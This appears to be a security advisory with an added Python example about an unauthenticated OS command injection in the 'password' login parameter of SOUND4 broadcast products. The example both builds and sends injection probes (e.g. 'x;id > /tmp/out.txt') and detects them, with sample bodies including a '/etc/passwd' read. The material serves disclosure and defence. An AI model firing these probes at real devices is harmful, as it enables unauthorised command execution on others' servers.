SOUND4 Impact, First, Pulse, and Eco Unauthenticated OS Command Injection Vulnerability
Vulnerability
An unauthenticated OS command injection vulnerability has been identified in the SOUND4 IMPACT, FIRST, PULSE, and Eco products through version 2.x. A remote attacker with no credentials can execute arbitrary shell commands by injecting them into the 'password' POST parameter of the login.php and index.php scripts; the injected commands run with the privileges of the web server process.
Impact
Exploitation gives a remote, unauthenticated attacker command execution on the server hosting the application, with the privileges of the web server account. No credentials are required, because the injection point is the login form itself.
Reproduction
To reproduce this vulnerability, send a POST request to 'login.php' or 'index.php' with the 'password' parameter carrying the injected shell command. The command is executed on the server, and either the response or a side effect of the command can be used to verify execution. For example, injecting a command that writes the output of 'id' to a file demonstrates successful exploitation: the file's presence, and the account it names, confirm both that the command ran and the privilege level it ran with.
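The request described above, together with a matching detection check, as an added example written for this page (it is not SOUND4 code and not the original advisory's proof of concept). It assumes the injected command follows the password text behind a shell separator; the advisory does not state which separator the handler needs, so ';' is a working assumption, as are the sample request bodies, which are constructed rather than captured:

```python
"""Probe builder and request-body detector for the SOUND4 'password'
parameter command injection described above. Added example, not SOUND4 code."""
import re
import urllib.parse
import urllib.request
from typing import List, Optional

VULNERABLE_SCRIPTS = ("login.php", "index.php")  # named in the advisory

# Assumption: the injected command is appended to the password value behind a
# shell separator. The advisory does not say which separator the handler
# needs, so ';' is a working assumption; change it if the probe does not fire.
SEPARATOR = ";"


def build_probe_body(command: str, prefix: str = "x") -> bytes:
    """Form-encode a password value that carries an injected shell command.

    `prefix` stands in for whatever password text precedes the separator.
    """
    payload = f"{prefix}{SEPARATOR}{command}"
    return urllib.parse.urlencode({"password": payload}).encode()


def send_probe(base_url: str, script: str, command: str, timeout: float = 10.0) -> str:
    """POST the probe to <base_url>/<script> and return the response body.

    Network call; not exercised by the offline checks below. The advisory's
    suggested proof is a command that writes the output of `id` to a file
    (the path used here is illustrative), whose effect you then confirm out
    of band or, if output is reflected, in the returned page.
    """
    if script not in VULNERABLE_SCRIPTS:
        raise ValueError(f"unexpected script {script!r}")
    req = urllib.request.Request(
        f"{base_url.rstrip('/')}/{script}",
        data=build_probe_body(command),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


# Detection side: shell metacharacters that have no business in a login
# password. '$', '&' and '|' do occur in legitimate passwords, so treat a
# match as a signal to review, not as proof of exploitation.
SHELL_META = re.compile(r"[;&|`\n]|\$\(|\$\{")


def flag_password_injection(body: str) -> Optional[str]:
    """Return the suspicious password value from a form-encoded POST body, or None."""
    fields = urllib.parse.parse_qs(body, keep_blank_values=True)
    for value in fields.get("password", []):
        if SHELL_META.search(value):
            return value
    return None


def scan_bodies(bodies: List[str]) -> List[str]:
    """Return the password values that look like injection attempts."""
    return [v for v in (flag_password_injection(b) for b in bodies) if v is not None]


# Constructed sample request bodies (not captured traffic).
SAMPLE_BODIES = [
    "password=correct-horse-battery",          # benign
    "password=x%3Bid+%3E+%2Ftmp%2Fout.txt",    # x;id > /tmp/out.txt
    "password=x%26%26+cat+%2Fetc%2Fpasswd",    # x&& cat /etc/passwd
    "password=pa%24%24word",                   # pa$$word: a lone '$' is fine
    "user=admin",                              # no password field at all
]

if __name__ == "__main__":
    print(build_probe_body("id > /tmp/out.txt"))
    for hit in scan_bodies(SAMPLE_BODIES):
        print("suspicious password value:", hit)
```

The detector reads decoded form bodies, so it needs request-body logging (or an inline WAF hook) rather than a plain access log, which records neither POST parameters nor the password value. On the fix side the advisory gives no source, but the class of defect is a login handler that passes the submitted password to a shell; the remedy is to never do that, not to filter metacharacters at the input.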
